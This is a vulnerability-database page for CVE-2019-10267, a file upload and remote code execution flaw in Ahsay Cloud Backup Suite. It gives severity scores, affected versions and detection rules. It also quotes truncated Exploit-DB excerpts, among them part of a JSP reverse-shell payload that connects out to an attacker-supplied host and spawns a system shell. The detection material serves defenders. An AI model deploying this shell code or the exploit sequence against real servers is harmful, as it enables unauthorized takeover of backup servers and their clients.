CVE-2019-10267
published 2019-07-26CVE-2019-10267: An insecure file upload and code execution issue was discovered in Ahsay Cloud Backup Suite 8.1.0.50. It is possible to upload a file into any directory of the…
PriorityP180high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
75.77%
99.5th percentile
An insecure file upload and code execution issue was discovered in Ahsay Cloud Backup Suite 8.1.0.50. It is possible to upload a file into any directory of the server. One can insert a JSP shell into the web server's directory and execute it. This leads to full access to the system, as the configured user (e.g., Administrator).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ahsay | cloud_backup_suite | >= 7.7.0.0 < 8.1.1.50 | 8.1.1.50 |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect exploit by monitoring HTTP PUT requests to /obs/obm7/file/upload with the custom headers X-RSW-Request-0, X-RSW-Request-1, and X-RSW-custom-encode-path present simultaneously — these are the authentication and path-encoding headers used by the exploit. ↗
- →Alert on HTTP PUT requests to /obs/obm7/file/upload where the uploaded body contains .jsp content, indicating a JSP webshell upload attempt. ↗
- →Monitor for POST requests to /obs/obm7/user/isTrialEnabled returning 'ENABLED' followed immediately by POST to /obs/obm7/user/addTrialUser — this sequence indicates automated trial account creation as a precursor to exploitation. ↗
- →Alert on GET requests to /cbs/system/ShowDownload.do followed by GET to /cbs/system/download/indexTab1.jsp — this is the version-check sequence used by the exploit's check() function to fingerprint vulnerable Ahsay instances. ↗
- ·The exploit requires valid credentials; however, if the Ahsay server has trial accounts enabled (ENABLED response from /obs/obm7/user/isTrialEnabled), an attacker can self-register an account before exploiting — no pre-existing credentials are needed in that case. ↗
- ·The default upload path used by the exploit is '../../webapps/cbs/help/en'; defenders should ensure this path (and the resulting web-accessible directory) is monitored for unexpected .jsp or .exe file creation. ↗
- ·The exploit uses SSL/HTTPS on port 443 by default; TLS inspection is required to detect the malicious headers and payload in transit. ↗
- ·The exploit performs cleanup (deletes uploaded .exe, .jsp, and user account files) after execution, so forensic artifacts may be limited; focus detection on the upload and trigger phases rather than post-exploitation file presence. ↗
CVSS provenance
nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated)
exploitdb·2019-07-26·CVSS 8.8
CVE-2019-10267 [HIGH] Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated)
Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated)
---
# Exploit Title: Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated)
# Date: 26-6-2019
# Exploit Author: Wietse Boonstra
# Vendor Homepage: https://ahsay.com
# Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe
# Version: 7.x
0 )
{{
ijb.write( buffer, 0, length );
ijb.flush();
}}
}} catch( Exception e ){{}}
try
{{
if( vo != null )
vo.close();
if( ijb != null )
ijb.close();
}} catch( Exception e ){{}}
}}
}}
try
{{
String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {{
ShellPath = new String("/bin/sh");
}} else {{
ShellPath = new String("cmd.exe");
}}
Socket socket = new Socket( "{0}", {1} );
Process process = Runtime.getRu
Exploit-DB
Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)
exploitdb·2019-07-26·CVSS 8.8
CVE-2019-10267 [HIGH] Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)
Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)
---
# Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. (Metasploit)
# Date: 26-6-2019
# Exploit Author: Wietse Boonstra
# Vendor Homepage: https://ahsay.com
# Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe
# Version: 7.x 'Ahsay Backup v7.x-v8.1.1.50 (authenticated) file upload',
'Description' => %q{
This module exploits an authenticated insecure file upload and code
execution flaw in Ahsay Backup v7.x - v8.1.1.50. To succesfully execute
the upload credentials are needed, default on Ahsay Backup trial
accounts are enabled so an account can be created.
It can be exploited in Windows and Linux environments to get re
Metasploit
Ahsay Backup v7.x-v8.1.1.50 (authenticated) file upload
metasploit
Ahsay Backup v7.x-v8.1.1.50 (authenticated) file upload
Ahsay Backup v7.x-v8.1.1.50 (authenticated) file upload
This module exploits an authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. To succesfully execute the upload credentials are needed, default on Ahsay Backup trial accounts are enabled so an account can be created. It can be exploited in Windows and Linux environments to get remote code execution (usualy as SYSTEM). This module has been tested successfully on Ahsay Backup v8.1.1.50 with Windows 2003 SP2 Server. Because of this flaw all connected clients can be configured to execute a command before the backup starts. Allowing an attacker to takeover even more systems and make it rain shells! Setting the CREATEACCOUNT to true will create a new account, this is enabled by default. If credeantial
No writeups or analysis indexed.
http://packetstormsecurity.com/files/153770/Ahsay-Backup-7.x-8.x-File-Upload-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/153771/Ahsay-Backup-7.x-8.x-File-Upload-Remote-Code-Execution.htmlhttps://www.wbsec.nl/ahsay/http://packetstormsecurity.com/files/153770/Ahsay-Backup-7.x-8.x-File-Upload-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/153771/Ahsay-Backup-7.x-8.x-File-Upload-Remote-Code-Execution.htmlhttps://www.wbsec.nl/ahsay/
2019-07-26
Published